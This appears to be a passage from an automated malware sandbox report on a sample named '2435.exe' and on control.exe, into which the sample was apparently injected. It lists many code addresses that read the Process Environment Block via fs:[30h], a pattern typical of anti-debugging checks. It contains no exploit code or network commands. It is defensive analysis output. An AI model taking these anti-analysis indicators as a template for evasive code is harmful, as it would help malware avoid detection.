          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B48CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B0C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B0C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B28DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B48D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AFA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B23D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A97D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B0FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B48ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B2FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B2FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A88794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B48F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04808CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0480740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0480740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0480740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04757D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_048005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_048005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04773D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047E3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0473AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04808D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047635A1 mov eax, dword ptr fs:[00000030h]
